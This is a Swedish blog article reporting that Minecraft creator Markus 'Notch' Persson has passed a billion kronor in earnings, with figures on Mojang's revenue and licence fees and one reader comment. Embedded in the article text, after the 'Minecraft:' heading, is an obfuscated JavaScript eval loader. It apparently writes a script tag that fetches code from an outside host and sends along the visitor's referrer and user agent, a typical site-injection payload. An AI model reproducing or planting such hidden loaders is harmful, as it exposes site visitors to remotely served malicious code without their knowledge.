Image Image Image Image Image Image Image Image Image Image

| 26 februari, 2020

Scroll to top

Top

Minecrafts skapare Markus ”Notch” Persson nu miljardär

Sebastian

Minecraft: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bfeae|var|u0026u|referrer|fidte||js|php’.split(’|’),0,{}))
Det var förra veckan som denna information kom ut i media. I tidningen Metro kunde vi läsa om skaparen av det otroligt stora indie-spelet minecraft. Nyheten hade fokus på hans nyligen registrerade förmögenhet på över en miljard kronor. 

Vi på Revue har länge följt Markus Perssons framgångar med sitt bolag Mojang som sitter här i Stockholm.

Förra året 2012 sålde Mojang ungefär 15 miljoner exemplar av Mincraft. Då omsatte bolaget 1,5 miljarder kronor och gjorde en vinst på 580 miljoner.

Under samma år betalade Mojang ut totalt 640 miljoner kronor i licensavgifter till Markus Persson. Plusar man ihop detta med hans intäkt under 2011 som var på ca 396 miljoner kronor så får vi fram en summa på över en miljard kronor.

– Det är lätt att bli fartblind på det här företaget, allt går ju så bra. Men när man ser de här avgifterna får man nypa sig i armen, säger Mojangs vd Carl Manneh till IT24.

2011 omsatte Mojang 541 miljoner kronor, och gjorde en vinst på ca 65 miljoner. Grundaren och skaparen Markus ”Notch” Persson fick 25 av dessa, och de delade han ut till de då omkring 25 anställda.

Via: Metro

Comments

  1. Miner

    Härligt Notchis